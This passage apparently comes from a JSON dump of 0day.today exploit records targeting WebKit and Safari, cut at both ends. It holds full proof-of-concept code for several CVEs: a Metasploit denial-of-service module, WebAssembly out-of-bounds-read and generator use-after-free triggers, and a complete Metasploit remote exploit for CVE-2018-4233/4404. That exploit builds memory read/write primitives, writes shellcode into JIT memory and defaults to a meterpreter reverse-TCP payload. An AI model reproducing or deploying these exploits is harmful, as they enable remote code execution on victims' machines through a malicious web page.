/usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508\r\n#1 WTF::StringImpl::hasHash\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514\r\n#2 WTF::StringImpl::hash\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525\r\n#3 WTF::StringHash::hash\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73\r\n#9 WTF::HashMap, WTF::HashTraits >::get\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406\r\n#10 webkitFaviconDatabaseSetIconURLForPageURL\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193\r\n#11 webkitFaviconDatabaseSetIconForPageURL\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318\r\n#12 webkitWebViewSetIcon\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964\r\n#13 WTF::Function::performCallbackWithReturnValue\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108\r\n#15 WebKit::WebPageProxy::dataCallback\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083\r\n#16 WebKit::WebPageProxy::finishedLoadingIcon\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848\r\n#17 IPC::callMemberFunctionImpl::operator()\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68\r\n#29 WTF::RunLoop::::_FUN(gpointer)\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70\r\n#30 g_main_dispatch\r\nat gmain.c line 3148\r\n#31 g_main_context_dispatch\r\nat gmain.c line 3813\r\n#32 g_main_context_iterate\r\nat gmain.c line 3886\r\n#33 g_main_context_iteration\r\nat gmain.c line 3947x\r\n#34 g_application_run\r\nat gapplication.c line 2401\r\n#35 main\r\nat ../src/ephy-main.c line 432 \r\n \r\n \r\n# Reference's:\r\n# https://bugs.webkit.org/show_bug.cgi?id=186164\r\n# https://bugzilla.gnome.org/show_bug.cgi?id=795740\n\n# 0day.today [2018-06-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30538"}, {"lastseen": "2018-06-12T00:51:24", "description": "Exploit for linux platform in category dos / poc", "edition": 1, "published": "2018-06-11T00:00:00", "title": "WebKitGTK+ < 2.21.3 - #WebKitFaviconDatabase DoS Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2018-06-11T00:00:00", "id": "1337DAY-ID-30569", "href": "https://0day.today/exploit/description/30569", "sourceData": "##\r\n# Title: WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS\r\n# Author: Dhiraj Mishra\r\n# Date: 2018-06-11\r\n# CVE: 2018-11646\r\n#\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Auxiliary\r\n include Msf::Exploit::Remote::HttpServer\r\n \r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => \"WebKitGTK+ WebKitFaviconDatabase DoS\",\r\n 'Description' => %q(\r\n This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.\r\n If successful, it could lead to application crash, resulting in denial of service.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Dhiraj Mishra', # Original discovery, disclosure\r\n 'Hardik Mehta', # Original discovery, disclosure\r\n 'Zubin Devnani', # Original discovery, disclosure\r\n 'Manuel Caballero' #JS Code\r\n ],\r\n 'References' => [\r\n ['EDB', '44842'],\r\n ['CVE', '2018-11646'],\r\n ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],\r\n ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']\r\n ],\r\n 'DisclosureDate' => 'Jun 03 2018',\r\n 'Actions' => [[ 'WebServer' ]],\r\n 'PassiveActions' => [ 'WebServer' ],\r\n 'DefaultAction' => 'WebServer'\r\n )\r\n )\r\n end\r\n \r\n def run\r\n exploit # start http server\r\n end\r\n \r\n def setup\r\n @html = <<-JS\r\n<script type=\"text/javascript\">\r\n win = window.open(\"WIN\", \"WIN\");\r\n window.open(\"http://example.com/\", \"WIN\");\r\n win.document.execCommand('stop');\r\n win.document.write(\"HelloWorld\");\r\n win.document.close();\r\n</script>\r\n JS\r\n end\r\n \r\n def on_request_uri(cli, _request)\r\n print_status('Sending response')\r\n send_response(cli, @html)\r\n end\r\nend\n\n# 0day.today [2018-06-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30569"}, {"lastseen": "2018-06-10T01:35:03", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2018-06-09T00:00:00", "title": "WebKit - WebAssembly Compilation Info Leak Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4222"], "modified": "2018-06-09T00:00:00", "id": "1337DAY-ID-30560", "href": "https://0day.today/exploit/description/30560", "sourceData": "<!--\r\nThere is an out-of-bounds read when compiling WebAssembly source buffers in WebKit. When a source buffer is compiled, it is first copied into a read-only buffer by the functuion getWasmBufferFromValue. This function returns the code buffer as follows:\r\n \r\nreturn arrayBufferView ? static_cast<uint8_t*>(arrayBufferView->vector()) : static_cast<uint8_t*>(arrayBuffer->impl()->data());\r\n \r\nIf the source buffer is a view (DataView or TypedArray), arrayBufferView->vector() is returned. The vector() method returns the start of the data in the buffer, including any offset. However, the function createSourceBufferFromValue copies the output of this function as follows:\r\n \r\nmemcpy(result.data(), data + byteOffset, byteSize);\r\n \r\nThis means that if the buffer is a view, the offset is added to the buffer twice before this is copied. This could allow memory off the heap to be read out of the source buffer, either though parsing exceptions or data sections when they are copied. A minimal PoC for the issue is:\r\n \r\nvar b2 = new ArrayBuffer(1000);\r\nvar view = new Int8Array(b2, 700);\r\nvar mod = new WebAssembly.Module(a);\r\n \r\nAn HTML file the consistently crashes Safari is attached.\r\n-->\r\n \r\n<html><body><script>\r\nfor(var q = 0; q < 100; q++){\r\nvar i = Math.random();\r\ni = Math.round(i*0x20000000);\r\ni = Math.abs(i);\r\nvar b2 = new Uint8Array( i);\r\nconsole.log(\"i\" + i);\r\nvar j = Math.random();\r\nj = j*i;\r\nj = Math.round(j);\r\nj = Math.abs(j);\r\nconsole.log(\"j\"+j)\r\nvar view2 = new DataView(b2.buffer,j);\r\ntry{\r\nvar mod = new WebAssembly.Module(view2);\r\n}catch(e){\r\nconsole.log(e);\r\n}\r\n}\r\n</script></body></html>\n\n# 0day.today [2018-06-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30560"}, {"lastseen": "2018-06-10T01:35:18", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2018-06-09T00:00:00", "title": "WebKit - Use-After-Free when Resuming Generator Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4218"], "modified": "2018-06-09T00:00:00", "id": "1337DAY-ID-30559", "href": "https://0day.today/exploit/description/30559", "sourceData": "<!--\r\nIn WebKit, resuming a generator is implemented in JavaScript. An internal object property, @generatorState is used to prevent recursion within generators. In GeneratorPrototype.js, the state is checked by calling:\r\n \r\n var state = [email\u00a0protected];\r\n \r\nand set by calling:\r\n \r\n [email\u00a0protected] = @GeneratorStateExecuting;\r\n \r\n \r\nChecking that the @generator property is set is also used in place of type checking the generator.\r\n \r\nTherefore, if Generator.next is called on an object with a prototype that is a Generator, it will pass the type check, and the internal properties of the Generator prototype will be used to resume the generator. However, when @generatorState, it will be set as an own property on the object, not the prototype. This allows the creation of non-Generator objects with the @generatorState set to completed.\r\n \r\nIt is then possible to bypass the recursion check by setting the prototype of one of these objects to a Generator, as the check will then get the object's @generatorState own property, meanwhile the other internal properties will come from the prototype.\r\n \r\nGenerators are not intended to allow recursion, so a reference to the scope is not maintained, leading to a use-after free.\r\n \r\nA minimal sample of the script causing this problem is below, and a full PoC is attached.\r\n \r\nvar iterator;\r\n \r\nvar a = [];\r\n \r\nfunction* foo(index) {\r\n \r\n while (1) {\r\n var q = a.pop();\r\n if(q){\r\n q.__proto__ = iterator;\r\n q.next();\r\n }\r\n yield index++;\r\n }\r\n}\r\n \r\nfunction* foo2(){\r\n yield;\r\n}\r\n \r\nvar temp = foo2(0);\r\n \r\nfor(var i = 0; i < 10; i++){ // make a few objects with @generatorState set\r\n var q = {};\r\n q.__proto__ = temp;\r\n q.next();\r\n q.__proto__ = {};\r\n a.push(q);\r\n \r\n}\r\n \r\niterator = foo(0);\r\n \r\nvar q = {};\r\nq.__proto__ = iterator;\r\nprint(q.next().value);\r\n-->\r\n \r\n<html><body><script>\r\nprint = console.log;\r\nprint(\"top\");\r\nvar iterator;\r\nvar o = function(){print(\"hello\")};\r\nvar a = [];\r\nfunction* foo(index) {\r\n //print(\"start\");\r\n \r\n while (1) {\r\n //if(index == 77){\r\n // o = 0;\r\n // gc(); \r\n// index = 2;\r\n // var a = [1, 2, 3, 4];\r\n //yield 9;\r\n //print(\"a vale \" + a[0]);\r\n //}\r\n //if(index == 1){\r\n //index = 77;\r\n // print(\"INTERNAL CALL\")\r\n // iterator.next();\r\n //index++;\r\n \r\n //}\r\n //var b = [1, 2, 3, 4];\r\n var q = a.pop();\r\n if(q){\r\n print(\"here1\");\r\n q.__proto__ = iterator;\r\n q.next();\r\n }\r\n yield index++;\r\n //print(\"bval\" + b[0]);\r\n }\r\n}\r\n \r\nfunction* foo2(){\r\n \r\n yield;\r\n \r\n}\r\n \r\nvar temp = foo2(0);\r\n \r\nfor(var i = 0; i < 10; i++){\r\n \r\n var q = {};\r\n q.__proto__ = temp;\r\n q.next();\r\n q.__proto__ = {};\r\n a.push(q);\r\n \r\n}\r\n//print(a);\r\niterator = foo(0);\r\n \r\n \r\n// expected output: 0\r\n \r\n \r\n \r\n \r\no.__proto__ = iterator;\r\n//print(\"FIRST CALL\")\r\n//print(o.next().value);\r\n//print(\"SECOND CALL\")\r\n//print(o.next().value);\r\n//print(\"THIRD CALL\")\r\n \r\nfor(var i = 0; i < 10; i++){\r\nvar q = {};\r\nq.__proto__ = iterator;\r\nprint(q.next(\"hello\").value);\r\n}\r\n \r\n//print(\"FOURTH CALL\")\r\n//print(iterator.next().value);\r\no();\r\n</script></body></html>\n\n# 0day.today [2018-06-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30559"}, {"lastseen": "2018-12-18T08:10:31", "description": "Exploit for macOS platform in category remote exploits", "edition": 1, "published": "2018-12-15T00:00:00", "title": "Safari - Proxy Object Type Confusion Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4404", "CVE-2018-4233"], "modified": "2018-12-15T00:00:00", "id": "1337DAY-ID-31793", "href": "https://0day.today/exploit/description/31793", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Safari Proxy Object Type Confusion',\r\n 'Description' => %q{\r\n This module exploits a type confusion bug in the Javascript Proxy object in\r\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\r\n it is possible to run arbitrary JS code during the execution of a CreateThis\r\n operation. This makes it possible to change the structure of e.g. an argument\r\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\r\n\r\n The JIT region is then replaced with shellcode which loads the second stage.\r\n The second stage exploits a logic error in libxpc, which uses command execution\r\n via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [ 'saelo' ],\r\n 'References' => [\r\n ['CVE', '2018-4233'],\r\n ['CVE', '2018-4404'],\r\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\r\n ['URL', 'https://github.com/saelo/pwn2own2018'],\r\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\r\n ],\r\n 'Arch' => [ ARCH_PYTHON, ARCH_CMD ],\r\n 'Platform' => 'osx',\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },\r\n 'Targets' => [\r\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\r\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],\r\n ],\r\n 'DisclosureDate' => 'Mar 15 2018'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\r\n ])\r\n end\r\n\r\n def offset_table\r\n {\r\n '10.12.6' => {\r\n :jsc_vtab => '0x0000d8d8',\r\n :dyld_stub_loader => '0x00001168',\r\n :dlopen => '0x000027f7',\r\n :confstr => '0x00002c84',\r\n :strlen => '0x00001b40',\r\n :strlen_got => '0xdc0',\r\n },\r\n '10.13' => {\r\n :jsc_vtab => '0x0000e5f8',\r\n :dyld_stub_loader => '0x000012a8',\r\n :dlopen => '0x00002e60',\r\n :confstr => '0x000024fc',\r\n :strlen => '0x00001440',\r\n :strlen_got => '0xee8',\r\n },\r\n '10.13.3' => {\r\n :jsc_vtab => '0xe5e8',\r\n :dyld_stub_loader => '0x1278',\r\n :dlopen => '0x2e30',\r\n :confstr => '0x24dc',\r\n :strlen => '0x1420',\r\n :strlen_got => '0xee0',\r\n },\r\n }\r\n end\r\n\r\n def exploit_data(directory, file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', directory, file\r\n ::File.binread path\r\n end\r\n\r\n def stage1_js\r\n stage1 = exploit_data \"CVE-2018-4233\", \"stage1.bin\"\r\n \"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);\"\r\n end\r\n\r\n def stage2_js\r\n stage2 = exploit_data \"CVE-2018-4404\", \"stage2.dylib\"\r\n payload_cmd = payload.raw\r\n if target['Arch'] == ARCH_PYTHON\r\n payload_cmd = \"echo \\\"#{payload_cmd}\\\" | python\"\r\n end\r\n placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')\r\n stage2[placeholder_index, payload_cmd.length] = payload_cmd\r\n \"var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);\"\r\n end\r\n\r\n def get_offsets(user_agent)\r\n if user_agent =~ /Intel Mac OS X (.*?)\\)/\r\n version = $1.gsub(\"_\", \".\")\r\n mac_osx_version = Gem::Version.new(version)\r\n if mac_osx_version >= Gem::Version.new('10.13.4')\r\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\r\n elsif mac_osx_version < Gem::Version.new('10.12')\r\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\r\n elsif offset_table.key?(version)\r\n offset = offset_table[version]\r\n return <<-EOF\r\nconst JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};\r\nconst DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};\r\nconst DLOPEN_OFFSET = #{offset[:dlopen]};\r\nconst CONFSTR_OFFSET = #{offset[:confstr]};\r\nconst STRLEN_OFFSET = #{offset[:strlen]};\r\nconst STRLEN_GOT_OFFSET = #{offset[:strlen_got]};\r\nEOF\r\n else\r\n print_warning \"No offsets for version #{mac_osx_version}\"\r\n end\r\n else\r\n print_warning \"Unexpected User-Agent\"\r\n end\r\n return false\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n user_agent = request['User-Agent']\r\n print_status(\"Request from #{user_agent}\")\r\n offsets = get_offsets(user_agent)\r\n unless offsets\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n utils = exploit_data \"CVE-2018-4233\", \"utils.js\"\r\n int64 = exploit_data \"CVE-2018-4233\", \"int64.js\"\r\n html = %Q^\r\n<html>\r\n<body>\r\n<script>\r\n#{stage1_js}\r\nstage1.replace = function(oldVal, newVal) {\r\n for (var idx = 0; idx < this.length; idx++) {\r\n var found = true;\r\n for (var j = idx; j < idx + 8; j++) {\r\n if (this[j] != oldVal.byteAt(j - idx)) {\r\n found = false;\r\n break;\r\n }\r\n }\r\n if (found)\r\n break;\r\n }\r\n this.set(newVal.bytes(), idx);\r\n};\r\n#{stage2_js}\r\n#{utils}\r\n#{int64}\r\n#{offsets}\r\n\r\nvar ready = new Promise(function(resolve) {\r\n if (typeof(window) === 'undefined')\r\n resolve();\r\n else\r\n window.onload = function() {\r\n resolve();\r\n }\r\n});\r\n\r\nready = Promise.all([ready]);\r\n\r\nprint = function(msg) {\r\n //console.log(msg);\r\n //document.body.innerText += msg + '\\\\n';\r\n}\r\n\r\n// Must create this indexing type transition first,\r\n// otherwise the JIT will deoptimize later.\r\nvar a = [13.37, 13.37];\r\na[0] = {};\r\n\r\nvar referenceFloat64Array = new Float64Array(0x1000);\r\n\r\n//\r\n// Bug: the DFG JIT does not take into account that, through the use of a\r\n// Proxy, it is possible to run arbitrary JS code during the execution of a\r\n// CreateThis operation. This makes it possible to change the structure of e.g.\r\n// an argument without causing a bailout, leading to a type confusion.\r\n//\r\n\r\n//\r\n// addrof primitive\r\n//\r\nfunction setupAddrof() {\r\n function InfoLeaker(a) {\r\n this.address = a[0];\r\n }\r\n\r\n var trigger = false;\r\n var leakme = null;\r\n var arg = null;\r\n\r\n var handler = {\r\n get(target, propname) {\r\n if (trigger)\r\n arg[0] = leakme;\r\n return target[propname];\r\n },\r\n };\r\n var InfoLeakerProxy = new Proxy(InfoLeaker, handler);\r\n\r\n for (var i = 0; i < 100000; i++) {\r\n new InfoLeakerProxy([1.1, 2.2, 3.3]);\r\n }\r\n\r\n trigger = true;\r\n\r\n return function(obj) {\r\n leakme = obj;\r\n arg = [1.1, 1.1];\r\n var o = new InfoLeakerProxy(arg);\r\n return o.address;\r\n };\r\n}\r\n\r\n//\r\n// fakeobj primitive\r\n//\r\nfunction setupFakeobj() {\r\n function ObjFaker(a, address) {\r\n a[0] = address;\r\n }\r\n\r\n var trigger = false;\r\n var arg = null;\r\n\r\n var handler = {\r\n get(target, propname) {\r\n if (trigger)\r\n arg[0] = {};\r\n return target[propname];\r\n },\r\n };\r\n var ObjFakerProxy = new Proxy(ObjFaker, handler);\r\n\r\n for (var i = 0; i < 100000; i++) {\r\n new ObjFakerProxy([1.1, 2.2, 3.3], 13.37);\r\n }\r\n\r\n trigger = true;\r\n\r\n return function(address) {\r\n arg = [1.1, 1.1];\r\n var o = new ObjFakerProxy(arg, address);\r\n return arg[0];\r\n };\r\n}\r\n\r\nfunction makeJITCompiledFunction() {\r\n // Some code to avoid inlining...\r\n function target(num) {\r\n for (var i = 2; i < num; i++) {\r\n if (num % i === 0) {\r\n return false;\r\n }\r\n }\r\n return true;\r\n }\r\n\r\n // Force JIT compilation.\r\n for (var i = 0; i < 1000; i++) {\r\n target(i);\r\n }\r\n for (var i = 0; i < 1000; i++) {\r\n target(i);\r\n }\r\n for (var i = 0; i < 1000; i++) {\r\n target(i);\r\n }\r\n return target;\r\n}\r\n\r\nfunction pwn() {\r\n // Spray Float64Array structures so that structure ID 0x1000 will\r\n // be a Float64Array with very high probability\r\n var structs = [];\r\n for (var i = 0; i < 0x1000; i++) {\r\n var a = new Float64Array(1);\r\n a['prop' + i] = 1337;\r\n structs.push(a);\r\n }\r\n\r\n // Setup exploit primitives\r\n var addrofOnce = setupAddrof();\r\n var fakeobjOnce = setupFakeobj();\r\n\r\n // (Optional) Spray stuff to keep the background GC busy and increase reliability even further\r\n /*\r\n var stuff = [];\r\n for (var i = 0; i < 0x100000; i++) {\r\n stuff.push({foo: i});\r\n }\r\n */\r\n\r\n var float64MemView = new Float64Array(0x200);\r\n var uint8MemView = new Uint8Array(0x1000);\r\n\r\n // Setup container to host the fake Float64Array\r\n var jsCellHeader = new Int64([\r\n 00, 0x10, 00, 00, // m_structureID\r\n 0x0, // m_indexingType\r\n 0x2b, // m_type\r\n 0x08, // m_flags\r\n 0x1 // m_cellState\r\n ]);\r\n\r\n var container = {\r\n jsCellHeader: jsCellHeader.asJSValue(),\r\n butterfly: null,\r\n vector: float64MemView,\r\n length: (new Int64('0x0001000000001337')).asJSValue(),\r\n mode: {}, // an empty object, we'll need that later\r\n };\r\n\r\n // Leak address and inject fake object\r\n // RawAddr == address in float64 form\r\n var containerRawAddr = addrofOnce(container);\r\n var fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16);\r\n print(\"[+] Fake Float64Array @ \" + fakeArrayAddr);\r\n\r\n ///\r\n /// BEGIN CRITICAL SECTION\r\n ///\r\n /// Objects are corrupted, a GC would now crash the process.\r\n /// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations.\r\n ///\r\n var driver = fakeobjOnce(fakeArrayAddr.asDouble());\r\n while (!(driver instanceof Float64Array)) {\r\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\r\n container.jsCellHeader = jsCellHeader.asJSValue();\r\n }\r\n\r\n // Get some addresses that we'll need to repair our objects. We'll abuse the .mode\r\n // property of the container to leak addresses.\r\n driver[2] = containerRawAddr;\r\n var emptyObjectRawAddr = float64MemView[6];\r\n container.mode = referenceFloat64Array;\r\n var referenceFloat64ArrayRawAddr = float64MemView[6];\r\n\r\n // Fixup the JSCell header of the container to make it look like an empty object.\r\n // By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array.\r\n driver[2] = emptyObjectRawAddr;\r\n var header = float64MemView[0];\r\n driver[2] = containerRawAddr;\r\n float64MemView[0] = header;\r\n\r\n // Copy the JSCell header from an existing Float64Array and set the butterfly to zero.\r\n // Also set the mode: make it look like an OversizeTypedArray for easy GC survival\r\n // (see JSGenericTypedArrayView<Adaptor>::visitChildren).\r\n driver[2] = referenceFloat64ArrayRawAddr;\r\n var header = float64MemView[0];\r\n var length = float64MemView[3];\r\n var mode = float64MemView[4];\r\n driver[2] = containerRawAddr;\r\n float64MemView[2] = header;\r\n float64MemView[3] = 0;\r\n float64MemView[5] = length;\r\n float64MemView[6] = mode;\r\n\r\n // Root the container object so it isn't garbage collected.\r\n // This will allocate a butterfly for the fake object and store a reference to the container there.\r\n // The fake array itself is rooted by the memory object (closures).\r\n driver.container = container;\r\n\r\n ///\r\n /// END CRITICAL SECTION\r\n ///\r\n /// Objects are repaired, we will now survive a GC\r\n ///\r\n if (typeof(gc) !== 'undefined')\r\n gc();\r\n\r\n memory = {\r\n read: function(addr, length) {\r\n driver[2] = memory.addrof(uint8MemView).asDouble();\r\n float64MemView[2] = addr.asDouble();\r\n var a = new Array(length);\r\n for (var i = 0; i < length; i++)\r\n a[i] = uint8MemView[i];\r\n return a;\r\n },\r\n\r\n write: function(addr, data) {\r\n driver[2] = memory.addrof(uint8MemView).asDouble();\r\n float64MemView[2] = addr.asDouble();\r\n for (var i = 0; i < data.length; i++)\r\n uint8MemView[i] = data[i];\r\n },\r\n\r\n read8: function(addr) {\r\n driver[2] = addr.asDouble();\r\n return Int64.fromDouble(float64MemView[0]);\r\n },\r\n\r\n write8: function(addr, value) {\r\n driver[2] = addr.asDouble();\r\n float64MemView[0] = value.asDouble();\r\n },\r\n\r\n addrof: function(obj) {\r\n float64MemView.leakme = obj;\r\n var butterfly = Int64.fromDouble(driver[1]);\r\n return memory.read8(Sub(butterfly, 0x10));\r\n },\r\n };\r\n\r\n print(\"[+] Got stable memory read/write!\");\r\n\r\n // Find binary base\r\n var funcAddr = memory.addrof(Math.sin);\r\n var executableAddr = memory.read8(Add(funcAddr, 24));\r\n var codeAddr = memory.read8(Add(executableAddr, 24));\r\n var vtabAddr = memory.read8(codeAddr);\r\n var jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET);\r\n print(\"[*] JavaScriptCore.dylib @ \" + jscBaseUnaligned);\r\n var jscBase = And(jscBaseUnaligned, new Int64(\"0x7ffffffff000\"));\r\n print(\"[*] JavaScriptCore.dylib @ \" + jscBase);\r\n\r\n var dyldStubLoaderAddr = memory.read8(jscBase);\r\n var dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET);\r\n var strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET));\r\n var libCBase = Sub(strlenAddr, STRLEN_OFFSET);\r\n print(\"[*] dyld.dylib @ \" + dyldBase);\r\n print(\"[*] libsystem_c.dylib @ \" + libCBase);\r\n\r\n var confstrAddr = Add(libCBase, CONFSTR_OFFSET);\r\n print(\"[*] confstr @ \" + confstrAddr);\r\n var dlopenAddr = Add(dyldBase, DLOPEN_OFFSET);\r\n print(\"[*] dlopen @ \" + dlopenAddr);\r\n\r\n // Patching shellcode\r\n var stage2Addr = memory.addrof(stage2);\r\n stage2Addr = memory.read8(Add(stage2Addr, 16));\r\n print(\"[*] Stage 2 payload @ \" + stage2Addr);\r\n\r\n stage1.replace(new Int64(\"0x4141414141414141\"), confstrAddr);\r\n stage1.replace(new Int64(\"0x4242424242424242\"), stage2Addr);\r\n stage1.replace(new Int64(\"0x4343434343434343\"), new Int64(stage2.length));\r\n stage1.replace(new Int64(\"0x4444444444444444\"), dlopenAddr);\r\n print(\"[+] Shellcode patched\");\r\n\r\n // Leak JITCode pointer poison value\r\n var poison_addr = Add(jscBase, 305152);\r\n print(\"[*] Poison value @ \" + poison_addr);\r\n var poison = memory.read8(poison_addr);\r\n print(\"[*] Poison value: \" + poison);\r\n\r\n // Shellcode\r\n var func = makeJITCompiledFunction();\r\n var funcAddr = memory.addrof(func);\r\n print(\"[+] Shellcode function object @ \" + funcAddr);\r\n var executableAddr = memory.read8(Add(funcAddr, 24));\r\n print(\"[+] Executable instance @ \" + executableAddr);\r\n var jitCodeAddr = memory.read8(Add(executableAddr, 24));\r\n print(\"[+] JITCode instance @ \" + jitCodeAddr);\r\n\r\n var codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32));\r\n var codeAddr = Xor(codeAddrPoisoned, poison);\r\n print(\"[+] RWX memory @ \" + codeAddr.toString());\r\n print(\"[+] Writing shellcode...\");\r\n var origCode = memory.read(codeAddr, stage1.length);\r\n memory.write(codeAddr, stage1);\r\n\r\n print(\"[!] Jumping into shellcode...\");\r\n var res = func();\r\n if (res === 0) {\r\n print(\"[+] Shellcode executed sucessfully!\");\r\n } else {\r\n print(\"[-] Shellcode failed to execute: error \" + res);\r\n }\r\n\r\n memory.write(codeAddr, origCode);\r\n print(\"[*] Restored previous JIT code\");\r\n\r\n print(\"[+] We are done here, continuing WebContent process as if nothing happened =)\");\r\n if (typeof(gc) !== 'undefined')\r\n gc();\r\n}\r\n\r\nready.then(function() {\r\n try {\r\n pwn();\r\n } catch (e) {\r\n print(\"[-] Exception caught: \" + e);\r\n }\r\n}).catch(function(err) {\r\n print(\"[-] Initializatin failed\");\r\n});\r\n\r\n</script>\r\n</body>\r\n</html>\r\n ^\r\n unless datastore['DEBUG_EXPLOIT']\r\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '')\r\n end\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n\r\nend\n\n# 0day.today [2018-12-18] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/31793"}, {"lastseen": "2019-06-03T13:53:45", "description": "This Metasploit module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The type confusion leads to the ability to allocate fake Javascript objects, as well as the ability to find the address in memory of a Javascript object. This allows us to construct a fake JSCell object that can be used to read and write arbitrary memory from Javascript. The module then uses a ROP chain to write the first stage shellcode into executable memory within the Safari process and kick off its execution. The first stage maps the second stage macho (containing CVE-2017-13861) into executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake exploit leads to a kernel task port (TFP0) that can read and write arbitrary kernel memory. The processes credential and sandbox structure in the kernel is overwritten and the meterpreter payloads code signature hash is added to the kernels trust cache, allowing Safari to load and execute the (self-signed) meterpreter payload.", "edition": 1, "published": "2019-06-03T00:00:00", "title": "Safari #Webkit Proxy Object Type Confusion Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4233", "CVE-2017-13861"], "modified": "2019-06-03T00:00:00", "id": "1337DAY-ID-32828", "href": "https://0day.today/exploit/description/32828", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n 